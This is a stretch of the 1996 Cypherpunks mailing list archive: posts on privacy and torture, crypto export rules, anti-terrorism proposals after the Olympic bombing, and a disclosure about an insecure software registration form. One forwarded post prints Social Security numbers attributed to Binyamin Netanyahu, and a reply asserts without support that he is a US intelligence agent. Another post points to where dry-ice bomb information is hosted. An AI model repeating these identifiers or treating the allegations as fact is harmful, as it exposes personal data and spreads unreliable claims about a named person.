the contents of our mind, would Dorothy support the application of such
techniques to suspects (under judicial warrants or other lawful authority)?
That is, does the opposition to torture arise from squeamishness about pain
or from some residual recognition of the right of personal autonomy. 

2)  Would those who support wiretapping but oppose torture waive their
opposition to torture in certain cases.  That is, if the continued existence
of the United States or indeed Life on Earth were dependent on a bit of
information stored in the brain of a single person, would those who
countenance some invasions of privacy in the social interest allow torture
in these (admittedly) rare cases?

Back to the main thread:

Dorothy, if you oppose torture then you have granted the validity of John's
belief in absolute privacy.  You are merely quibbling about where that zone
of privacy ends.  You might say that the zone of privacy ends at the brain
but that is too narrow a range.  Personal autonomy exists in the technical
sense because only I command my thoughts.  Only I can order my muscles to
move.  I can be chained and tortured and even hooked up to some sort of
electrical apparatus to attempt to short circuit my muscular control and get
my hand to jump but such coercion is pretty crude.  If someone else wants me
to dance a Waltz smoothly or write a paragraph of original material, they
are going to need my cooperation (however secured).  My zone of absolute
privacy extends to those things I can directly control with my thoughts.  

This area also extends to communications.  If I arrange things such that no
one else can overhear me and whisper something to another person, then we
both share knowledge that can only be secured by others through torture (and
not always then) or through the decision of one of us to give it up.  The
same thought in two heads is still as much within the zone of privacy as
that thought within one head.  And so on multiplied by 1000.  The zone of
privacy arises from the inability of other people to directly command the
mind of one person or a thousand persons.  We have the control.  Absent
torture, you can't get it if we choose not to give it to you.

Note that this zone already extends beyond the brain case.  It travels down
our nerves to the tips of our fingers and toes.  We command those nerves and
that wiring represents an extension of our brain.  One of the things that we
can do with those nerves is to use them to generate signals of various
kinds.  This signal generation is *also* an extension of our brain.  It is
under our control.  If we like, we can arrange things so that no one else or
only the intended recipient can know our thoughts.  We have that power.  We
have used our zone of privacy to extend its scope.  We have done (continue
to do) it all from inside our brains.  We have not left that sanctuary --
that fortress built by the rejection of torture by advanced societies.

Therefore, if we develop the technical means to *extend* that zone of
privacy beyond our heads, bodies, and those we can whisper to, you can only
break the zone by the torture which you have already eschewed.  The nature
of the zone of privacy is not a grant from the State, it is the result of
our nature as independent *actors* and our collective decision (in the West
at least) to minimize the use of torture by governments.  

The Internet itself is an example of individual cooperation to extend
communications channels from one person to many (it was built by its users).
Those same users can, if they choose, use their autonomy to build in
security features of their collective design.  It belongs to them as their
minds belong to them.  It is an extension of those minds.

Dorothy, you or I may not like the thoughts or communications of specific
people but they have the same right to secure those thoughts and
communications if they choose to.

Now in reading all this, you may wonder what this has to do with key escrow
and Gang of Seven (G7) crypto policy.  Dorothy, as virtually the sole
non-government employee who supports Clipper and SKE, I believe you to be
unique in another way.  I think that you can be "saved" from tyranny (which
is always rough on the tyrants).  Unlike the government employees on your
side of the argument, you have generally not favored outlawing private use
of strong crypto.  We would like to separate you from them on this
fundamental question of personal autonomy.  The Century of Blood that the
world has just lived through at the hands of its governments (160 million
murdered) causes many of us to believe that some of your allies (who BTW
currently include the Kingdom of the Saud and the People's Republic of
China) would use torture and other very inhumane means to violate even our
traditional zone of privacy.

If you will merely grant to us the *morality* of our attempt to use the zone
of privacy which you have granted to us to extend that zone of privacy, we
will grant you an understanding of your fears of this new world (which many
of us share).  

Please, separate yourself absolutely from the torturers.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Meredith <meredith@ecid.cig.mot.com>
Date: Thu, 1 Aug 1996 21:51:29 +0800
To: leonardo@lview.com
Subject: Security of Web registration of Lview Pro
Message-ID: <32008FD6.9A5@ecid.cig.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sirs,

I was happy to find that you have put up an SSL form through which one
can register Lview Pro. I filled it in and pressed the button. My
browser then warned me that although the form was sent to me securely,
the data I was sending back was in the clear!

I had a look at the page source for:

  https://commerce.mindspring.com/www.lview.com/iregform.htm

and there is was:

<FORM METHOD="POST"
ACTION="http://www.std.com/Newbury/leonardo/cgi-bin/fp.exe"><P>
        ^^^^

Therefore the only thing protected by this "Secure Form" is the original
text of the form, rather than the credit card details. I know that:

    "If using an SSL Web browser such as Netscape or Microsoft
     Explorer, please click here to access a secure document."

doesn't actually *say* that your customers card details are secure, but
at first glance it sounded like it to me.

Whatever others may think about the rights and wrongs of it, my personal
policy is not to commit credit card details to open networks, unless
under strong encryption.

I look forward to your comments.

Andy Meredith




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Fri, 2 Aug 1996 06:57:10 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <199608010243.WAA28665@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <320101B9.500F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter D. Junger wrote:
> 
> Tom Weinstein writes:
> 
> : The only thing they can revoke is their permission to provide it for
> : download over the internet.  They can't revoke our permission to
> : sell it in stores or via snail mail.
> 
> Why can't they?  What steps do you take to make sure that the people
> you sell it to aren't--gasp--foreign persons?

We only ship the domestic version to addresses inside the US.  They
State Department seems to think this is sufficient.  Of course, a
foreign person can always fly here and pick up a copy at Fry's, but
that's not our problem.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 2 Aug 1996 06:52:29 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Jewell is the Militia Bomber!!!!
In-Reply-To: <ae25a290040210043ec2@[205.199.118.202]>
Message-ID: <Pine.GUL.3.95.960801122744.24298D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Anyone who thinks I can say "conspiracy against fat people who read gun
magazines" with a straight face, raise your hand. Sheesh.

But there was a serious point in there, as there was in Tim's joke.

-rich

On Wed, 31 Jul 1996, Timothy C. May wrote:

> At 5:53 AM 8/1/96, Rich Graves wrote:
> 
> >Ferchrissakes, guys, take a step back and look at yourselves. You're playing
> >the spin control game just as fast and furious as the "bad guys" (?). First
> >the glee over how easy it was to find bomb-making instructions anywhere,
> >then saying it was a provocation by the government, now it becomes a
>                                                      ^^^^^^^^^^^^^^^^
> >conspiracy against fat people who read gun magazines.
>  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> Rich, maybe you're spending too much time amongst the Zundelsite Neo-Nazis.
> You no longer recognize humor even when it's pretty damned obvious.
> 
> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 2 Aug 1996 05:24:49 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Internal Passports
In-Reply-To: <ae26305c070210048f37@[205.199.118.202]>
Message-ID: <3200ED63.C96@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
Tim wrote:
> I'm with Duncan and Lucky on this one. Nations with a "Privacy Ombudsman"
> are almost always nations with extensive files on individuals, their
> habits, and their political activities.

That reminds me:  I thumbed through BiBi's terrorism book (the one D.S.
certified as prerequisite reading for particpation in intelligent
discussions about something-or-other) at B&N the other day.  It's a
pretty thin book.  Most of it seems to be about the rise of the Moslem
Menace and how the Sultan's hordes will soon be upon us all.  The last
chapter outlines all the "necessary measures" governments must take
to stamp out the wildfire of terrorism.  Same old same old, mostly,
like allowing suspects to be held without charges, allowing warrantless
searches (I think), thorough weapon registration, and so on.  The last
one (or next-to-last; I think the last one is "brainwash the populace
into thinking this is all a good idea") is about establishing a 
periodic "civil liberties review panel".

Yeah right.


______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 07:43:56 +0800
To: cypherpunks@toad.com
Subject: Re: A funny thing happend to my data on the way to the bank
Message-ID: <ae2657840a021004c287@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:45 PM 8/1/96, anonymous-remailer@shell.portal.com wrote:

>The Prime Minister's Social Security Number
>Prime Minister Binyamin Netanyahu's US Social Security Number is
>172-42-6111, according to the Boston  Consulting Group in Massachusetts,
>which employed Netanyahu for about one-year during 1979-80.=20
>
>The number indicated by the marketing firm contradicts information contained
>in a credit report by  the US federally-regulated Transunion Company, pulled
>from company files during the first days of July.  According to that report,
>Netanyahu and an American named   John J. Sullivan both used Social Security
>number 020-36-4537.
>
>Questions were raised in the reports as to whether  Netanyahu had attempted
>to create a false identity or had used a number which was not his.
>Publication of the credit report findings, and later  reports indicating
>that Netanyahu's name had suddenly been deleted from Transunion's files,
>raised additional questions about possible computer break-ins into the
>company's records.

It is not likely to be a "break-in." Rather, the Big Three credit reporting
agencies, Transunion, TRW Credit, and Equifax, routinely are complicit in
creating false credit histories as part of the "legends" of agents, persons
in the Federal Witness Security Program, etc.

(Do you not think Equifax would "notice" a new identity which popped into
existence in 1995, complete with a 10-year credit history, a high school
diploma, a record of past employment, etc.? There is a good reason these
companies have close ties with the TLAs in the D.C. area...where, perhaps
coincidentally, they have major offices.)

My Cyphernomicon has more information about the roles the credit agencies
have played in creating false identities and maintaining their cover, and
the role of FinCEN and its ties to these nominally-private agencies.

What this report about Net-n-Yahoo has confirmed is his almost certain role
as an agent of the U.S. intelligence agencies. His role in the Pollard case
is likely to come out in the next few months.

(Look for legislation from Feinswine and others making it a felony to
disclose Social Security numbers....)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 2 Aug 1996 04:43:12 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Welcome Back
Message-ID: <2.2.32.19960801164920.0087e858@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 AM 8/1/96 -0400, Brian Davis wrote:

>Uh oh.  The hell with the FAA.  What about the Disney people?  Michael 
>Eisner may sent Goofy to lean on you!
>
>EBD
>No longer a federal prosecutor!

Welcome back.  I missed your posts.

Do you have an honest job or are you still taking the King's Shilling?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 2 Aug 1996 05:02:53 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Welcome Back
In-Reply-To: <2.2.32.19960801164920.0087e858@panix.com>
Message-ID: <Pine.BSF.3.91.960801125001.8158H-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain



> At 11:51 AM 8/1/96 -0400, Brian Davis wrote:
> 
> >Uh oh.  The hell with the FAA.  What about the Disney people?  Michael 
> >Eisner may sent Goofy to lean on you!
> >
> >EBD
> >No longer a federal prosecutor!
> 
> Welcome back.  I missed your posts.

Thanks.

> 
> Do you have an honest job or are you still taking the King's Shilling?

I have opened a law practice.  Just this morning, I visited a client (in 
jail) charged with conspiracy to distribute cocaine  ...  in other words, 
one of the Four Horsemen. They checked me for weapons, etc., upon entry, 
but no one asked about any cryptographic munitions.

Brian


> 
> DCF
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 07:21:00 +0800
To: cypherpunks@toad.com
Subject: Jew Bits, Credentials, and the Cypherpunk Way
Message-ID: <ae2659ce0b0210044c33@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM 8/1/96, Alex de Joode wrote:
>Ernest Hua (hua@chromatic.com) wrote:
>: How does one verify that an IP address is coming from a U.S. site?
>: How do most FTP site (e.g. those which carry crypto) determine the
>: origins of a connection?
>
>What's the use ? It makes it only nominally more difficult to access
>an US crypto site, one needs first to esthablish an US beachhead ie.
>open an US account, and ftp the eleet crypto warez using the newly
>created US account as an intermediary.
>
>So the next step will be a tag that a user is an 'alien' ?

Along with the "Jew bit."

(Credit goes to Hugh Daniel, as I recall, for this one. At the CFP in '95
he made up various badges with things like this, including "Is your Jew bit
set?")

On a serious note, the whole thrust of the CDA discussion raised this
issue, of having "age bits" in all packets and/or credentials. There is the
very real danger, I fear, that the current swirl of topics (terrorism,
exports, G7 New World Order, pornography, bomb-making, etc.) will lead to
moves for "credentials" of various sorts.

(I'm sure the IETF folks can point out the problems with such schemes. I'm
not sure they'd fly, but they may get proposed.)

Such credentials--aka "the Internet Driver's License"--could have fields
for name, true name, key, age, sex, and perhaps even things like special
orders from courts (e.g., "Tim May is under court order in Idaho, U.S., not
to have access to aptical foddering information"). Many countries, which do
not have the nominal separation of church and state the U.S has, will want
fields for religious affiliation, etc.

We cannot fight this at the ballot box, as the trends are simply too strong
(as Lucky notes, Americans will cheer when strong crypto is outlawed). The
only way is the Cypherpunk Way: Direct Action Through Technology.

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@galaxy.galstar.com (Igor Chudov)
Date: Fri, 2 Aug 1996 05:16:30 +0800
To: cypherpunks@toad.com
Subject: IPSEC for Linux
Message-ID: <199608011800.NAA29524@galaxy.galstar.com>
MIME-Version: 1.0
Content-Type: text


Hello,

Is there an implementation of IPSEC for Linux?

Thanks,

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@azstarnet.com (David M. Rose)
Date: Fri, 2 Aug 1996 08:53:33 +0800
To: cypherpunks@toad.com
Subject: Internal Passports
Message-ID: <199608012006.NAA22850@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


On 1 Aug 1996 (Timothy C. May) wrote:

>I'm with Duncan and Lucky on this one. Nations with a "Privacy Ombudsman"
>are almost always nations with extensive files on individuals, their
>habits, and their political activities.
>
>Having a "Privacy Ombudsman" is a bone thrown to the proles. I suspect a
>police state like Singapore has such a person.

My understanding is that the acceptable term is "ombud", or possibly
"ombuds".  Cf.: "chair", "anchor", "milk", "post", "g-", "colored",  "fire",
"police", "China", "French", etc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 1 Aug 1996 21:52:05 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Jewell is the Militia Bomber!!!!
In-Reply-To: <ae25687f0102100499f1@[205.199.118.202]>
Message-ID: <320090AF.4DAA423A@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> (P.S. I, too, was convinced Jewell was the guy. But in recent hours it is
> looking like a "rush to judgment" could be involved. There is strong
> pressure to "solve the crime" by the close of the Olympics on Sunday.)

Yes, a public hanging would be a fine way to end the Olympics.

After all, this is Georgia we're talking about ...

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 1 Aug 1996 22:07:54 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Jewell is the Militia Bomber!!!!
In-Reply-To: <199608010522.WAA04374@mail.pacifier.com>
Message-ID: <3200924C.64880EEB@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> 
> At 07:49 PM 7/31/96 -0700, Timothy C. May wrote:
> > 
> >2. They found a _shotgun_ in his cabin.
> 
> No, no, Tim.   The proper way to deliver this to a TV audience is, "They
> found an ARSENAL in his COMPOUND!"

Alternatively, describe the shotgun as a 50 caliber cannon.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 06:56:21 +0800
To: cypherpunks@toad.com
Subject: Jim Bell, stay out of Georgia....
Message-ID: <01I7RJRMNIE88Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	They're arresting this guy because he had one mention of a Molotov
Cocktail? Why am I reminded of the Haymarket trials? Where's a Governor
Altgeld when you need him? Admittedly, this guy doesn't seem too bright... but
if that were a reason to lock him up, the prisons would be even more crowded
than they are now.
	-Allen

>Anarchist charged with advocating government overthrow

>   _(c) Copyright 1996 Nando.net _
   
>    New York Times
    
   
   
>   JONESBORO, Ga. -- An 18-year-old self-styled anarchist who allegedly
>   distributed a free, homemade pamphlet with anti-government rhetoric
>   has been charged with advocating the overthrow of the U.S. government.
   
[...]

>   Clayton County police Lt. Larry Gibson said Moreland turned himself in
>   Sunday. Authorities obtained an arrest warrant for Moreland Saturday
>   after the pipe bombing at Centennial Olympic Park, although police say
>   they don't think he played any role in the crime.
   
>   "He told us he was only interested in destroying property, and I don't
>   think he fully understands the ramifications," Gibson said. "Whatever
>   he was up to, we wanted to nip it in the bud."
   
>   Moreland had been under investigation since July 8 when authorities
>   received a copy of a pamphlet called "Rise Above." Police traced the
>   pamphlets to a mail box service in a shopping center allegedly rented
>   in Moreland's name.
   
>   The pamphlet was laced with with anti-police cartoons, obscenities,
>   and anarchist slogans. The one overt reference to violence was an
>   illustration of a "Molotov cocktail" on the same sheet with a recipe
>   for "soy milk" made from water-soaked soybeans, sugar and vanilla and
>   strained through a T-shirt.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Fri, 2 Aug 1996 06:42:25 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.29 - Administration, Congress Propose   Sweeping Anti-Terrorism Initiatives
In-Reply-To: <199608011743.KAA03854@mail.pacifier.com>
Message-ID: <3200FAEB.92A@frb.gov>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> 
> At 10:03 AM 8/1/96 -0400, Bob Palacios wrote:
> 
> >   The Center for Democracy and Technology  /____/     Volume 2, Number 29
> > CDT POLICY POST Volume 2, Number 29                        August 1, 1996
> >I. NEW THREATS TO ENCRYPTION, OPPOSITION TO THE PRO-CODE BILL
[...]
> 
> Sure, Clinton did not actually claim that encryption was a factor, but it
> was there by implication, and the average citizen seeing his proposals would
> come to that conclusion.   Denying this specifically, you'd be "points
> ahead" and would be in a better position to shut down those trying to
> restrict encryption.

When Clinton closed Pennsylvania Avenue to vehicular traffic, he cited
the
private plane that crased on the South Lawn as one of the reasons for
the
tighter security.  But closing the road north of the White House would
surely
not have kept an airplane at bay.

If the Feinstein amendment passes (outlawing "bomb-making information"),
will
the Congressional Record be censored?  Will Joe Biden be held
accountable for
making the material available?

-- 
rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 06:47:28 +0800
To: cypherpunks@toad.com
Subject: Attempted balance... too far on the security side
Message-ID: <01I7RK3PK2HG8Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Mixed messages, definitely. For one thing, people appear not to be
realizing that even with terrorism, trains and airplanes are still safer per
passenger mile than automobile. Driving people to drive more (no pun intended)
isn't going to save any lives. Besides which, if I've got an emergency flight
to catch, I may be willing to take the risk. Is there some reason that all
flights must be held to the same security, so long as everyone getting on
knows what level of security that is? Moreover, the suggestion of greater
humint bears with it infiltration (and possible agent procacateurship of)
any group that the government doesn't like.
	-Allen

>America's dilemma: Balancing security and an open society

>   _(c) Copyright 1996 Nando.net_
   
>    Associated Press
    
>   WASHINGTON -- after the bombing at the olympics and the loss of twa
>   flight 800, americans grappled sunday with how to maintain security in
>   a society that prizes individual liberty above all.
   
>   Travelers said they would accept longer delays for better baggage
>   checks and politicians reopened debate over thorny provisions cut from
>   an antiterrorism bill. But many weighed the desire for safety against
>   the pleasures of an open society.
   
>   "We must never accept as a fact of life that we will have to live with
>   terrorism," said Deputy Attorney General Jamie Gorelick. "We must and
>   will come up with the tools to prevent these events."
   
>   But Gorelick conceded there may be a price. "Balancing the competing
>   interests in openness and security will be something that will be a
>   subject for all of us for many years to come," she told NBC's "Meet
>   the Press."
   
[...]

>   Joyce Lee, catching a train home to Newark, Del., from Washington's
>   Union Station on Sunday, said she's "a little leery about travel these
>   days."
   
>   "You don't know when you're going to get it. A bomb could go off
>   anywhere, anytime," she said. "I would definitely be willing to go
>   through more security because safety and having to wait a few extra
>   minutes is worth it."
   
>   Security consultants predicted public pressure would force greater
>   restrictions in public places and increased scrutiny at airports. But
>   others noted that security was tight at the Olympics before the
>   bombing, and warned that adopting a police-state mentality would
>   represent defeat.
   
>   "I don't want to see the terrorists win by, in effect, revoking our
>   Constitution," Sen. Patrick Leahy, D-Vt., said on Fox's "News Sunday."
   
>   A terrorist can always move on to the next target. If airports are
>   sealed, will train stations be safe? How about movie theaters?
   
>   "Ultimately the question is, can you protect perfectly in public
>   places?" said Atlanta Mayor Bill Campbell. "And the answer is no."
   
[...]

>   The antiterrorism bill that Clinton signed earlier this year applied
>   the death penalty to terrorism convictions and provided $1 billion for
>   law enforcement to fight terrorists.
   
>   But a provision to allow the FBI to wiretap all phones used by a
>   suspected terrorist was dropped and one requiring explosives
>   manufacturers to insert chemical tracers in their products was
>   weakened.
   
>   Gingrich said Sunday that he was willing to revisit those issues, but
>   that a proposal to allow police to conduct so-called "roving wiretaps"
>   was too great an intrusion of privacy.
   
>   "Our system is designed to go slowly, frankly, to protect freedoms,"
>   he said on "Meet the Press."
   
>   Sen. Sam Nunn, D-Ga., said that despite the recent incidents, the Cold
>   War's end has produced a period of relative safety for the United
>   States.
   
[...]

>   But he warned that unless steps were taken to block terrorists from
>   obtaining weapons-grade uranium or chemical weapons, Americans might
>   soon be longing for the days of the simple pipe bomb.
   
>   The key to fighting terrorism, he said, was increasing the United
>   States' ability to gather human intelligence -- information often
>   gathered covertly by infiltrating terrorist groups or spying on their
>   sponsors.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 2 Aug 1996 09:42:59 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Tolerance
Message-ID: <199608012148.OAA21170@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a comment to all of the 'true libertarians' out there, especially
the "defend to the death" types:  How many of you defended Mr.
Sternlight's recent membership?

# Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
# Automatically receive my resume or PGPKEY by sending email with a subject
# of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
# Web site: http://www.io-online.com/adamsc/adamsc.htm
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 2 Aug 1996 09:46:38 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Welcome Back
Message-ID: <199608012151.OAA17837@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 PM 8/1/96 -0400, Brian Davis wrote:

>> Do you have an honest job or are you still taking the King's Shilling?
>
>I have opened a law practice.  Just this morning, I visited a client (in 
>jail) charged with conspiracy to distribute cocaine  ...  in other words, 
>one of the Four Horsemen. They checked me for weapons, etc., upon entry, 
>but no one asked about any cryptographic munitions.

Joke of the day:

A swarthy fellow was in jail, and was visited by his sister and nerd brother 
in law.  He tells them, "next time you show up, bring me something with a file 
in it."  His bro in law brought a floppy disk...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Fri, 2 Aug 1996 07:27:34 +0800
To: cypherpunks@toad.com
Subject: Terror attack!
Message-ID: <32010AC5.1513@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


"I think I see one outside my window!  Help!"


A breaking story from Reuters:

> FBI Chief Says U.S. Under Terrorist Attack

> WASHINGTON (Reuter) - FBI Director Louis Freeh warned Congress Thursday
> that the United States was under attack from foreigh terrorists and 
> said new counter-terrorism weapons were needed to fight back. 



Why don't they just be done with it and declare martial law?
	
______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 2 Aug 1996 07:01:33 +0800
To: cypherpunks@toad.com
Subject: [Editorial] Privacy commisioner right-Canada
Message-ID: <9607018389.AA838936610@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Privacy commisioner right
Editorial
Ottawa Citizen, July 31

Bruce Phillips, the privacy commisioner, has again called for reinforcements to
defend personal privacy against the assaults of commercialism and technology. It
is a call that demands action-from the federal government, Parliament and every
Canadian.

The commisioner's annual report proposes two essential recommendations. First,
the government should make the protection of privacy a condition of sale
whenever a government enterprise is sold to the private sector. Second, the
government and Parliament must pass a law extending the enforcement of privacy
rights to private-sector businesses in federal jurisdiction.

Phillips is right. As thousands of public servants are transferred out of
government service, they lose the protection of the Privacy Act -- which covers
only government departments and agencies. And as more personal information about
all of us accumulates in the corporate sector, there is an intensified public
interest in extending legal protections.

*******
Phillips acknowledges the profitability of buying, selling and exploiting
personal data on employees and customers. And he sees the power of new
technologies to make privacy violations faster, cheaper, more comprehensive and
always more intrusive.
*******

But he insists that preserving personal privacy is both possible and necessary:
"If we discard the notion of privacy and simply treat one another as data
subjects, as objects of surveillance, we abandon that fundamental, democratic
notion of autonomy and self-determination."

Right Again.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 2 Aug 1996 06:15:31 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: [off-topic] domain name server needed
Message-ID: <Pine.SUN.3.95.960801145635.1688O-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have access to a DNS server that they can use to list a very
small number of start of authority records for me for a minor experiment? 

[This message may have been dictated with Dragon Dictate 2.01. 
Please be alert for unintentional word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here!  And humid!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Fri, 2 Aug 1996 07:10:52 +0800
To: cypherpunks@toad.com
Subject: Bombs & bomb threats in LA
Message-ID: <01I7RKOB77H48Y4XIK@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Well, dry ice bombs are in the rec.pyrotechnics FAQ, stored among other
places at:
http://www.nectec.or.th/pub/mirrors/faq/pyrotechnics-faq	

and everyplace else all the news.answers FAQs are stored. What, precisely, is
an acid bomb? Also note the standard blame-the-Internet (not, say, increased
irritation with government after the Republicans failed to reduce it) rhetoric.
	-Allen


>   Cobb Group - Netscape

>      NUMBER OF LEGITIMATE BOMB THREATS HAVE INCREASED IN L.A. OVER 1995

>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Los Angeles Daily News

>   LOS ANGELES (Aug 1, 1996 10:11 a.m. EDT) -- A bomb threat closed the
>   entire roadway network within the Los Angeles International Airport
>   for 45 minutes, creating a massive traffic tangle that came on top of
>   delays from heightened security.

[...]

>   Police say the case is the latest in a rash of bomb threats and
>   suspicious package discoveries in Los Angeles borne of heightened
>   concern and publicity surrounding the recent bombing at the Olympics,
>   the mysterious crash of TWA Flight 800 and last year's Oklahoma City
>   bombing.
   
>   Each threat is taken seriously by law enforcement officials, who who
